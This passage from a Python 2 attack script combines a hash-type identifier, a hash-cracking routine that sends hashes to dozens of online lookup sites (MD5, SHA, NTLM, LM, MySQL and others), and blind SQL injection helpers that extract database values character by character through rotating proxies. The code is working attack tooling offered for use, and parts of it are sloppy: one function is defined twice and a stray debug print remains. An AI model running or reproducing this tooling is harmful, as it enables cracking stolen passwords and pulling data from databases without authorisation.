2785.             return None
2786.        
2787.         match = search (r'Hash: [^<]*<br />Plain: [^<]*<br />', html)
2788.        
2789.         if match:
2790.             return match.group().split('<br />')[1][7:]
2791.         else:
2792.             return None
2793.  
2794.  
2795. def md5saltpassusername():
2796.     hs='9ae20f88189f6e3a62711608ddb6f5fd'
2797.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2798.         jerar.append("106320")
2799. def md5saltmd5pass():
2800.     hs='aca2a052962b2564027ee62933d2382f'
2801.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2802.         jerar.append("106340")
2803. def md5saltmd5passsalt():
2804.     hs='de0237dc03a8efdf6552fbe7788b2fdd'
2805.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2806.         jerar.append("106360")
2807. def md5saltmd5passsalt():
2808.     hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f'
2809.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2810.         jerar.append("106380")
2811. def md5saltmd5saltpass():
2812.     hs='d8f3b3f004d387086aae24326b575b23'
2813.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2814.         jerar.append("106400")
2815. def md5saltmd5md5passsalt():
2816.     hs='81f181454e23319779b03d74d062b1a2'
2817.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2818.         jerar.append("106420")
2819. def md5username0pass():
2820.     hs='e44a60f8f2106492ae16581c91edb3ba'
2821.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2822.         jerar.append("106440")
2823. def md5usernameLFpass():
2824.     hs='654741780db415732eaee12b1b909119'
2825.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2826.         jerar.append("106460")
2827. def md5usernamemd5passsalt():
2828.     hs='954ac5505fd1843bbb97d1b2cda0b98f'
2829.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2830.         jerar.append("106480")
2831.  
2832.  
2833. class MYINFOSEC:
2834.    
2835.     name =      "myinfosec"
2836.     url =       "http://md5.myinfosec.net"
2837.     supported_algorithm = [MD5]
2838.    
2839.     def isSupported (self, alg):
2840.        
2841.        
2842.        
2843.         if alg in self.supported_algorithm:
2844.             return True
2845.         else:
2846.             return False
2847.  
2848.  
2849.  
2850.     def crack (self, hashvalue, alg):
2851.        
2852.        
2853.        
2854.        
2855.        
2856.         if not self.isSupported (alg):
2857.             return None
2858.        
2859.        
2860.         url = "http://md5.myinfosec.net/md5.php"
2861.        
2862.        
2863.         params = { "md5hash" : hashvalue }
2864.        
2865.        
2866.         response = do_HTTP_request ( url, params )
2867.        
2868.        
2869.         html = None
2870.         if response:
2871.             html = response.read()
2872.         else:
2873.             return None
2874.        
2875.         match = search (r'<center></center>[^<]*<font color=green>[^<]*</font><br></center>', html)
2876.        
2877.         if match:
2878.             return match.group().split('>')[3][:-6]
2879.         else:
2880.             return None
2881.  
2882.  
2883.  
2884. class MD5_NET:
2885.    
2886.     name =      "md5.net"
2887.     url =       "http://md5.net"
2888.     supported_algorithm = [MD5]
2889.    
2890.     def isSupported (self, alg):
2891.        
2892.        
2893.        
2894.         if alg in self.supported_algorithm:
2895.             return True
2896.         else:
2897.             return False
2898.  
2899.  
2900.  
2901.     def crack (self, hashvalue, alg):
2902.        
2903.        
2904.        
2905.        
2906.        
2907.         if not self.isSupported (alg):
2908.             return None
2909.        
2910.        
2911.         url = "http://www.md5.net/cracker.php"
2912.        
2913.        
2914.         params = { "hash" : hashvalue }
2915.        
2916.        
2917.         response = do_HTTP_request ( url, params )
2918.        
2919.        
2920.         html = None
2921.         if response:
2922.             html = response.read()
2923.         else:
2924.             return None
2925.        
2926.         match = search (r'<input type="text" id="hash" size="32" value="[^"]*"/>', html)
2927.        
2928.         if match:
2929.             return match.group().split('"')[7]
2930.         else:
2931.             return None
2932.  
2933.  
2934.  
2935.  
2936. class NOISETTE:
2937.    
2938.     name =      "noisette.ch"
2939.     url =       "http://md5.noisette.ch"
2940.     supported_algorithm = [MD5]
2941.    
2942.     def isSupported (self, alg):
2943.        
2944.        
2945.        
2946.         if alg in self.supported_algorithm:
2947.             return True
2948.         else:
2949.             return False
2950.  
2951.  
2952.  
2953.     def crack (self, hashvalue, alg):
2954.        
2955.        
2956.        
2957.        
2958.        
2959.         if not self.isSupported (alg):
2960.             return None
2961.        
2962.        
2963.         url = "http://md5.noisette.ch/index.php"
2964.        
2965.        
2966.         params = { "hash" : hashvalue }
2967.        
2968.        
2969.         response = do_HTTP_request ( url, params )
2970.        
2971.        
2972.         html = None
2973.         if response:
2974.             html = response.read()
2975.         else:
2976.             return None
2977.        
2978.         match = search (r'<p>String to hash : <input name="text" value="[^"]+"/>', html)
2979.        
2980.         if match:
2981.             return match.group().split('"')[3]
2982.         else:
2983.             return None
2984.  
2985.  
2986.  
2987.  
2988. class MD5HOOD:
2989.    
2990.     name =      "md5hood"
2991.     url =       "http://md5hood.com"
2992.     supported_algorithm = [MD5]
2993.    
2994.     def isSupported (self, alg):
2995.        
2996.        
2997.        
2998.         if alg in self.supported_algorithm:
2999.             return True
3000.         else:
3001.             return False
3002.  
3003.  
3004.  
3005.     def crack (self, hashvalue, alg):
3006.        
3007.        
3008.        
3009.        
3010.        
3011.         if not self.isSupported (alg):
3012.             return None
3013.        
3014.        
3015.         url = "http://md5hood.com/index.php/cracker/crack"
3016.        
3017.        
3018.         params = { "md5" : hashvalue,
3019.                "submit" : "Go" }
3020.        
3021.        
3022.         response = do_HTTP_request ( url, params )
3023.        
3024.        
3025.         html = None
3026.         if response:
3027.             html = response.read()
3028.         else:
3029.             return None
3030.        
3031.         match = search (r'<div class="result_true">[^<]*</div>', html)
3032.        
3033.         if match:
3034.             return match.group().split('>')[1][:-5]
3035.         else:
3036.             return None
3037.  
3038.  
3039.  
3040. class STRINGFUNCTION:
3041.    
3042.     name =      "stringfunction"
3043.     url =       "http://www.stringfunction.com"
3044.     supported_algorithm = [MD5, SHA1]
3045.    
3046.     def isSupported (self, alg):
3047.        
3048.        
3049.        
3050.         if alg in self.supported_algorithm:
3051.             return True
3052.         else:
3053.             return False
3054.  
3055.  
3056.  
3057.     def crack (self, hashvalue, alg):
3058.        
3059.        
3060.        
3061.        
3062.        
3063.         if not self.isSupported (alg):
3064.             return None
3065.        
3066.        
3067.         url = ""
3068.         if alg == MD5:
3069.             url = "http://www.stringfunction.com/md5-decrypter.html"
3070.         else:
3071.             url = "http://www.stringfunction.com/sha1-decrypter.html"
3072.        
3073.        
3074.         params = { "string" : hashvalue,
3075.                "submit" : "Decrypt",
3076.                "result" : "" }
3077.        
3078.        
3079.         response = do_HTTP_request ( url, params )
3080.        
3081.        
3082.         html = None
3083.         if response:
3084.             html = response.read()
3085.         else:
3086.             return None
3087.        
3088.         match = search (r'<textarea class="textarea-input-tool-b" rows="10" cols="50" name="result"[^>]*>[^<]+</textarea>', html)
3089.        
3090.         if match:
3091.             return match.group().split('>')[1][:-10]
3092.         else:
3093.             return None
3094.  
3095.  
3096.  
3097.  
3098.  
3099. class XANADREL:
3100.    
3101.     name =      "99k.org"
3102.     url =       "http://xanadrel.99k.org"
3103.     supported_algorithm = [MD4, MD5]
3104.    
3105.     def isSupported (self, alg):
3106.        
3107.        
3108.        
3109.         if alg in self.supported_algorithm:
3110.             return True
3111.         else:
3112.             return False
3113.  
3114.  
3115.  
3116.     def crack (self, hashvalue, alg):
3117.        
3118.        
3119.        
3120.        
3121.        
3122.         if not self.isSupported (alg):
3123.             return None
3124.        
3125.        
3126.         url = "http://xanadrel.99k.org/hashes/index.php?k=search"
3127.        
3128.        
3129.         params = { "hash" : hashvalue,
3130.                "search" : "ok" }
3131.        
3132.        
3133.         response = do_HTTP_request ( url, params )
3134.        
3135.        
3136.         html = None
3137.         if response:
3138.             html = response.read()
3139.         else:
3140.             return None
3141.        
3142.         match = search (r'<p>Hash : [^<]*<br />Type : [^<]*<br />Plain : "[^"]*"<br />', html)
3143.        
3144.         if match:
3145.             return match.group().split('"')[1]
3146.         else:
3147.             return None
3148.  
3149.  
3150. def Tiger128():
3151.     hs='c086184486ec6388ff81ec9f23528727'
3152.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
3153.         jerar.append("106220")
3154. def Tiger128HMAC():
3155.     hs='c87032009e7c4b2ea27eb6f99723454b'
3156.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
3157.         jerar.append("106225")
3158. def md5passsalt():
3159.     hs='5634cc3b922578434d6e9342ff5913f7'
3160.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
3161.         jerar.append("106240")
3162. def md5saltmd5pass():
3163.     hs='245c5763b95ba42d4b02d44bbcd916f1'
3164.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
3165.         jerar.append("106260")
3166. def md5saltpass():
3167.     hs='22cc5ce1a1ef747cd3fa06106c148dfa'
3168.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
3169.         jerar.append("106280")
3170. def md5saltpasssalt():
3171.     hs='469e9cdcaff745460595a7a386c4db0c'
3172.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
3173.         jerar.append("106300")
3174.  
3175.  
3176. class SANS:
3177.    
3178.     name =      "sans"
3179.     url =       "http://isc.sans.edu"
3180.     supported_algorithm = [MD5, SHA1]
3181.    
3182.     def isSupported (self, alg):
3183.        
3184.        
3185.        
3186.         if alg in self.supported_algorithm:
3187.             return True
3188.         else:
3189.             return False
3190.  
3191.  
3192.  
3193.     def crack (self, hashvalue, alg):
3194.        
3195.        
3196.        
3197.        
3198.        
3199.         if not self.isSupported (alg):
3200.             return None
3201.        
3202.        
3203.         url = "http://isc.sans.edu/tools/reversehash.html"
3204.        
3205.         headers = { "User-Agent" : USER_AGENTS[randint(0, len(USER_AGENTS))-1] }
3206.        
3207.        
3208.         response = do_HTTP_request ( url, httpheaders=headers )
3209.         html = None
3210.         if response:
3211.             html = response.read()
3212.         else:
3213.             return None
3214.         match = search (r'<input type="hidden" name="token" value="[^"]*" />', html)
3215.         token = ""
3216.         if match:
3217.             token = match.group().split('"')[5]
3218.         else:
3219.             return None
3220.        
3221.         params = { "token" : token,
3222.                "text" : hashvalue,
3223.                "word" : "",
3224.                "submit" : "Submit" }
3225.        
3226.        
3227.         headers["Referer"] = "http://isc.sans.edu/tools/reversehash.html"
3228.        
3229.        
3230.         response = do_HTTP_request ( url, params, headers )
3231.        
3232.        
3233.         html = None
3234.         if response:
3235.             html = response.read()
3236.         else:
3237.             return None
3238.        
3239.         match = search (r'... hash [^\s]* = [^\s]*\s*</p><br />', html)
3240.        
3241.         if match:
3242.             print "hola mundo"
3243.             return match.group().split('=')[1][:-10].strip()
3244.         else:
3245.             return None
3246.  
3247.  
3248.  
3249. class BOKEHMAN:
3250.    
3251.     name =      "bokehman"
3252.     url =       "http://bokehman.com"
3253.     supported_algorithm = [MD4, MD5]
3254.    
3255.     def isSupported (self, alg):
3256.        
3257.        
3258.        
3259.         if alg in self.supported_algorithm:
3260.             return True
3261.         else:
3262.             return False
3263.  
3264.  
3265.  
3266.     def crack (self, hashvalue, alg):
3267.        
3268.        
3269.        
3270.        
3271.        
3272.         if not self.isSupported (alg):
3273.             return None
3274.        
3275.        
3276.         url = "http://bokehman.com/cracker/"
3277.        
3278.        
3279.         response = do_HTTP_request ( url )
3280.         html = None
3281.         if response:
3282.             html = response.read()
3283.         else:
3284.             return None
3285.         match = search (r'<input type="hidden" name="PHPSESSID" id="PHPSESSID" value="[^"]*" />', html)
3286.         phpsessnid = ""
3287.         if match:
3288.             phpsessnid = match.group().split('"')[7]
3289.         else:
3290.             return None
3291.         match = search (r'<input type="hidden" name="key" id="key" value="[^"]*" />', html)
3292.         key = ""
3293.         if match:
3294.             key = match.group().split('"')[7]
3295.         else:
3296.             return None
3297.        
3298.         params = { "md5" : hashvalue,
3299.                "PHPSESSID" : phpsessnid,
3300.                "key" : key,
3301.                "crack" : "Try to crack it" }
3302.        
3303.        
3304.         response = do_HTTP_request ( url, params )
3305.        
3306.        
3307.         html = None
3308.         if response:
3309.             html = response.read()
3310.         else:
3311.             return None
3312.        
3313.         match = search (r'<tr><td>[^<]*</td><td>[^<]*</td><td>[^s]*seconds</td></tr>', html)
3314.        
3315.         if match:
3316.             return match.group().split('td>')[1][:-2]
3317.         else:
3318.             return None
3319.  
3320.  
3321.  
3322. class GOOG_LI:
3323.  
3324.     name =      "goog.li"
3325.     url =       "http://goog.li"
3326.     supported_algorithm = [MD5, MYSQL, SHA1, SHA224, SHA384, SHA256, SHA512, RIPEMD, NTLM, GOST, WHIRLPOOL, LDAP_MD5, LDAP_SHA1]
3327.    
3328.     def isSupported (self, alg):
3329.        
3330.        
3331.        
3332.         if alg in self.supported_algorithm:
3333.             return True
3334.         else:
3335.             return False
3336.  
3337.  
3338.     def crack (self, hashvalue, alg):
3339.        
3340.        
3341.        
3342.        
3343.        
3344.         if not self.isSupported (alg):
3345.             return None
3346.            
3347.         hash2 = None
3348.         if alg in [NTLM] and ':' in hashvalue:
3349.             hash2 = hashvalue.split(':')[1]
3350.         else:
3351.             hash2 = hashvalue
3352.        
3353.        
3354.         if alg == MYSQL and hash2[0] != '*':
3355.             hash2 = '*' + hash2
3356.        
3357.        
3358.         url = "http://goog.li/?q=%s" % (hash2)
3359.        
3360.        
3361.         response = do_HTTP_request ( url )
3362.        
3363.        
3364.         html = None
3365.         if response:
3366.             html = response.read()
3367.         else:
3368.             return None
3369.        
3370.         match = search (r'<br />cleartext[^:]*: [^<]*<br />', html)
3371.        
3372.         if match:
3373.             return match.group().split(':')[1].strip()[:-6]
3374.         else:
3375.             return None
3376.  
3377.  
3378.  
3379. class WHREPORITORY:
3380.  
3381.     name =      "Windows Hashes Repository"
3382.     url =       "http://nediam.com.mx"
3383.     supported_algorithm = [LM, NTLM]
3384.    
3385.     def isSupported (self, alg):
3386.        
3387.        
3388.        
3389.         if alg in self.supported_algorithm:
3390.             return True
3391.         else:
3392.             return False
3393.  
3394.  
3395.     def crack (self, hashvalue, alg):
3396.        
3397.        
3398.        
3399.        
3400.        
3401.         if not self.isSupported (alg):
3402.             return None
3403.            
3404.         hash2 = None
3405.         if ':' in hashvalue:
3406.             if alg == LM:
3407.                 hash2 = hashvalue.split(':')[0]
3408.             else:
3409.                 hash2 = hashvalue.split(':')[1]
3410.         else:
3411.             hash2 = hashvalue
3412.        
3413.        
3414.         url = ""
3415.         params = None
3416.         headers = None
3417.         if alg == LM:
3418.             url = "http://nediam.com.mx/winhashes/search_lm_hash.php"
3419.             params = { "lm" : hash2,
3420.                 "btn_go" : "Search" }
3421.             headers = { "Referer" : "http://nediam.com.mx/winhashes/search_lm_hash.php" }
3422.         else:
3423.             url = "http://nediam.com.mx/winhashes/search_nt_hash.php"
3424.             params = { "nt" : hash2,
3425.                 "btn_go" : "Search" }
3426.             headers = { "Referer" : "http://nediam.com.mx/winhashes/search_nt_hash.php" }
3427.        
3428.        
3429.         response = do_HTTP_request ( url, params, headers )
3430.        
3431.        
3432.         html = None
3433.         if response:
3434.             html = response.read()
3435.         else:
3436.             return None
3437.        
3438.         match = search (r'<tr><td align="right">PASSWORD</td><td>[^<]*</td></tr>', html)
3439.        
3440.         if match:
3441.             return match.group().split(':')[1]
3442.         else:
3443.             return None
3444.  
3445.  
3446.  
3447. def GHash323():
3448.     hs='80000000'
3449.     if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True:
3450.         jerar.append("103040")
3451. def GHash325():
3452.     hs='85318985'
3453.     if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True:
3454.         jerar.append("103020")
3455.  
3456. def DESUnix():
3457.     hs='ZiY8YtDKXJwYQ'
3458.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False:
3459.         jerar.append("104020")
3460.  
3461. def MD5Half():
3462.     hs='ae11fd697ec92c7c'
3463.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
3464.         jerar.append("105060")
3465. def MD5Middle():
3466.     hs='7ec92c7c98de3fac'
3467.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
3468.         jerar.append("105040")
3469. def MySQL():
3470.     hs='63cea4673fd25f46'
3471.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
3472.         jerar.append("105020")
3473.  
3474. def DomainCachedCredentials():
3475.     hs='f42005ec1afe77967cbc83dce1b4d714'
3476.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
3477.         jerar.append("106025")
3478. def Haval128():
3479.     hs='d6e3ec49aa0f138a619f27609022df10'
3480.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
3481.         jerar.append("106160")
3482. def Haval128HMAC():
3483.     hs='3ce8b0ffd75bc240fc7d967729cd6637'
3484.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
3485.         jerar.append("106165")
3486. def MD2():
3487.     hs='08bbef4754d98806c373f2cd7d9a43c4'
3488.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
3489.         jerar.append("106060")
3490. def MD2HMAC():
3491.     hs='4b61b72ead2b0eb0fa3b8a56556a6dca'
3492.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
3493.         jerar.append("106120")
3494. def MD4():
3495.     hs='a2acde400e61410e79dacbdfc3413151'
3496.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
3497.         jerar.append("106040")
3498. def MD4HMAC():
3499.     hs='6be20b66f2211fe937294c1c95d1cd4f'
3500.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
3501.         jerar.append("106100")
3502. def MD5():
3503.     hs='ae11fd697ec92c7c98de3fac23aba525'
3504.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
3505.         jerar.append("106020")
3506. def MD5HMAC():
3507.     hs='d57e43d2c7e397bf788f66541d6fdef9'
3508.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
3509.         jerar.append("106080")
3510. def MD5HMACWordpress():
3511.     hs='3f47886719268dfa83468630948228f6'
3512.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
3513.         jerar.append("106140")
3514. def NTLM():
3515.     hs='cc348bace876ea440a28ddaeb9fd3550'
3516.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
3517.         jerar.append("106029")
3518. def RAdminv2x():
3519.     hs='baea31c728cbf0cd548476aa687add4b'
3520.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
3521.         jerar.append("106027")
3522. def RipeMD128():
3523.     hs='4985351cd74aff0abc5a75a0c8a54115'
3524.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
3525.         jerar.append("106180")
3526. def RipeMD128HMAC():
3527.     hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3'
3528.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
3529.         jerar.append("106185")
3530. def SNEFRU128():
3531.     hs='4fb58702b617ac4f7ca87ec77b93da8a'
3532.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
3533.         jerar.append("106200")
3534. def SNEFRU128HMAC():
3535.     hs='59b2b9dcc7a9a7d089cecf1b83520350'
3536.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
3537.         jerar.append("106205")
3538.  
3539.  
3540. def GetThatShit(head_URL):
3541.         source = ""
3542.         global gets;global proxy_num
3543.         head_URL = head_URL.replace("+",arg_eva)
3544.         request_web = urllib2.Request(head_URL)
3545.         request_web.add_header('User-Agent',agent)
3546.         while len(source) < 1:
3547.                 if arg_debug == "on":
3548.                         print "\n[proxy]:",proxy_list_count[proxy_num % proxy_len]+"\n[agent]:",agent+"\n[debug]:",head_URL,"\n"
3549.                 try:
3550.                         gets+=1;proxy_num+=1
3551.                         source = proxy_list[proxy_num % proxy_len].open(request_web).read()
3552.                 except (KeyboardInterrupt, SystemExit):
3553.                         raise
3554.                 except (urllib2.HTTPError):
3555.                         print "[-] Unexpected error:", sys.exc_info()[0],"\n[-] Trying again!"
3556.                         print "[proxy]:",proxy_list_count[proxy_num % proxy_len]+"\n[agent]:",agent+"\n[debug]:",head_URL,"\n"
3557.                         break
3558.                 except:
3559.                         print "[-] Unexpected error:", sys.exc_info()[0],"\n[-] Look at the error and try to figure it out!"
3560.                         print "[proxy]:",proxy_list_count[proxy_num % proxy_len]+"\n[agent]:",agent+"\n[debug]:",head_URL,"\n"
3561.                         raise
3562.         return source
3563.  
3564. def GuessValue(URL):
3565.         lower = lower_bound;upper = upper_bound
3566.         while lower < upper:
3567.                 try:
3568.                         mid = (lower + upper) / 2
3569.                         head_URL = URL + ">"+str(mid)
3570.                         source = GetThatShit(head_URL)
3571.                         match = re.findall(arg_string,source)
3572.                         if len(match) >= 1:
3573.                                 lower = mid + 1
3574.                         else:
3575.                                 upper = mid                    
3576.                 except (KeyboardInterrupt, SystemExit):
3577.                         raise
3578.                 except:
3579.                         pass
3580.  
3581.         if lower > lower_bound and lower < upper_bound:
3582.                 value = lower
3583.         else:
3584.                 head_URL = URL + "="+str(lower)
3585.                 source = GetThatShit(head_URL)
3586.                 match = re.findall(arg_string,source)
3587.                 if len(match) >= 1:
3588.                         value = lower
3589.                 else:
3590.                         value = 63
3591.                         print "Could not find the ascii character! There must be a problem.."
3592.                         print "Check to make sure your using the my script right!"
3593.                         print "READ xprog's blind sql tutorial!\n"
3594.                         sys.exit(1)
3595.         return value
3596.  
3597.  
3598. def CRC16():
3599.     hs='4607'
3600.     if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True:
3601.         jerar.append("101020")
3602. def CRC16CCITT():
3603.     hs='3d08'
3604.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
3605.         jerar.append("101040")
3606. def FCS16():
3607.     hs='0e5b'
3608.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
3609.         jerar.append("101060")
3610.  
3611. def CRC32():
3612.     hs='b33fd057'
3613.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
3614.         jerar.append("102040")
3615. def ADLER32():
3616.     hs='0607cb42'
3617.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
3618.         jerar.append("102020")
3619. def CRC32B():
3620.     hs='b764a0d9'
3621.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
3622.         jerar.append("102060")
3623. def XOR32():
3624.     hs='0000003f'
3625.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
3626.         jerar.append("102080")
3627.  
3628.  
3629.  
3630. def c1(word):
3631.     s = hashlib.sha1()
3632.     s.update(word[:-1])
3633.     s2 = hashlib.sha1()
3634.     s2.update(s.digest())
3635.     return s2.hexdigest()
3636.  
3637. def c2(word):
3638.     s = sha.new()
3639.     s.update(word[:-1])
3640.     s2 = sha.new()
3641.     s2.update(s.digest())
3642.     return s2.hexdigest()
3643.  
3644. def mysql323(clear):
3645.     nr = 1345345333
3646.     add = 7
3647.     nr2 = 0x12345671
3648.     retval = ""
3649.     for c in clear:
3650.         if c == ' ' or c == '\t':
3651.             continue
3652.         tmp = ord(c)
3653.         nr ^= (((nr & 63) + add) * tmp) + (nr << 8)
3654.         nr2 += (nr2 << 8) ^ nr
3655.         add += tmp
3656.     res1 = nr & ((1 << 31) - 1)
3657.     res2 = nr2 & ((1 << 31) - 1)
3658.     return "%08lx%08lx" % (res1, res2)
3659.  
3660.  
3661. CRAKERS = [     SCHWETT,
3662.         NETMD5CRACK,
3663.         MD5_CRACKER,
3664.         BENRAMSEY,
3665.         GROMWEB,
3666.         HASHCRACKING,
3667.         VICTOROV,
3668.         THEKAINE,
3669.         TMTO,
3670.         REDNOIZE,
3671.         MD5_DB,
3672.         MY_ADDR,
3673.         MD5PASS,
3674.         MD5DECRYPTION,
3675.         MD5CRACK,
3676.         MD5ONLINE,
3677.         MD5_DECRYPTER,
3678.         AUTHSECUMD5,
3679.         HASHCRACK,
3680.         OPHCRACK,
3681.         C0LLISION,
3682.         CMD5,
3683.         AUTHSECUCISCO7,
3684.         CACIN,
3685.         IBEAST,
3686.         PASSWORD_DECRYPT,
3687.         BIGTRAPEZE,
3688.         HASHCHECKER,
3689.         MD5HASHCRACKER,
3690.         PASSCRACKING,
3691.         ASKCHECK,
3692.         FOX21,
3693.         NICENAMECREW,
3694.         JOOMLAAA,
3695.         MD5_LOOKUP,
3696.         SHA1_LOOKUP,
3697.         SHA256_LOOKUP,
3698.         RIPEMD160_LOOKUP,
3699.         MD5_COM_CN,
3700.         DIGITALSUN,
3701.         DRASEN,
3702.         MYINFOSEC,
3703.         MD5_NET,
3704.         NOISETTE,
3705.         MD5HOOD,
3706.         STRINGFUNCTION,
3707.         XANADREL,
3708.         SANS,
3709.         BOKEHMAN,
3710.         GOOG_LI,
3711.         WHREPORITORY ]
3712.  
3713. def configureCookieProcessor(cookiefile='/tmp/searchmyhash.cookie'):
3714.    
3715.    
3716.     cookieHandler = LWPCookieJar()
3717.     if cookieHandler is not None:
3718.         if path.isfile (cookiefile):
3719.             cookieHandler.load (cookiefile)
3720.            
3721.         opener = urllib2.build_opener ( urllib2.HTTPCookieProcessor(cookieHandler) )
3722.         urllib2.install_opener (opener)
3723.  
3724.  
3725.  
3726. def do_HTTP_request (url, params={}, httpheaders={}):
3727.    
3728.  
3729.     data = {}
3730.     request = None
3731.    
3732.     if params:
3733.         data = urlencode(params)
3734.  
3735.         request = urllib2.Request ( url, data, headers=httpheaders )
3736.     else:
3737.         request = urllib2.Request ( url, headers=httpheaders )
3738.        
3739.     try:
3740.         response = urllib2.urlopen (request)
3741.     except:
3742.         return ""
3743.    
3744.     return response
3745.  
3746.  
3747.  
3748.  
3749.  
3750.  
3751. def crackHash (algorithm, hashvalue=None, hashfile=None):
3752.    
3753.    
3754.     global CRAKERS
3755.    
3756.     crackedhashes = []
3757.    
3758.     cracked = False
3759.    
3760.     if (not hashvalue and not hashfile) or (hashvalue and hashfile):
3761.         return False
3762.    
3763.     hashestocrack = None
3764.     if hashvalue:
3765.         hashestocrack = [ hashvalue ]
3766.     else:
3767.         try:
3768.             hashestocrack = open (hashfile, "r")
3769.         except:
3770.             print "\nIt is not possible to read input file (%s)\n" % (hashfile)
3771.             return cracked
3772.    
3773.    
3774.    
3775.     for activehash in hashestocrack:
3776.         hashresults = []
3777.        
3778.        
3779.         activehash = activehash.strip()
3780.         if algorithm not in [JUNIPER, LDAP_MD5, LDAP_SHA1]:
3781.             activehash = activehash.lower()
3782.        
3783.        
3784.         print "\nCracking HASH: %s\n" % (activehash) ; file.write("\nCracking HASH: %s\n" % (activehash))
3785.  
3786.        
3787.         begin = randint(0, len(CRAKERS)-1)
3788.        
3789.         for i in range(len(CRAKERS)):
3790.            
3791.            
3792.             cr = CRAKERS[ (i+begin)%len(CRAKERS) ]()
3793.            
3794.            
3795.             if not cr.isSupported ( algorithm ):
3796.                 continue
3797.            
3798.            
3799.             print "Analyzing With %s (%s)..." % (cr.name, cr.url)
3800.            
3801.            
3802.             result = None
3803.             try:
3804.                 result = cr.crack ( activehash, algorithm )
3805.             except:
3806.                 print "\n Session Cancelled \n"
3807.                 if hashfile:
3808.                     try:
3809.                         hashestocrack.close()
3810.                     except:
3811.                         pass
3812.                 return False
3813.            
3814.             cracked = 0
3815.             if result:
3816.                
3817.                 if algorithm in [MD4, MD5, SHA1,  SHA224, SHA384, SHA256, SHA512, RIPEMD]:
3818.                     h = hashlib.new (algorithm)
3819.                     h.update (result)
3820.                    
3821.                     if h.hexdigest() == activehash:
3822.                         hashresults.append (result)
3823.                         cracked = 2
3824.                
3825.                 elif algorithm in [LDAP_MD5, LDAP_SHA1]:
3826.                     alg = algorithm.split('_')[1]
3827.                     ahash =  decodestring ( activehash.split('}')[1] )
3828.                    
3829.                     h = hashlib.new (alg)
3830.                     h.update (result)
3831.                    
3832.                     if h.digest() == ahash:
3833.                         hashresults.append (result)
3834.                         cracked = 2
3835.                
3836.                 elif algorithm == NTLM or (algorithm == LM and ':' in activehash):
3837.                     candidate = hashlib.new('md4', result.split()[-1].encode('utf-16le')).hexdigest()
3838.                    
3839.                     if (':' in activehash and candidate == activehash.split(':')[1]) or (':' not in activehash and candidate == activehash):
3840.                         hashresults.append (result)
3841.                         cracked = 2
3842.                
3843.                 else:
3844.                     hashresults.append (result)
3845.                     cracked = 1
3846.            
3847.             if cracked:
3848.                 print "\n***** HASH CRACKED!! *****\nThe original string is: %s\n" % (result)
3849.                 if cracked == 2:
3850.                     break
3851.             else:
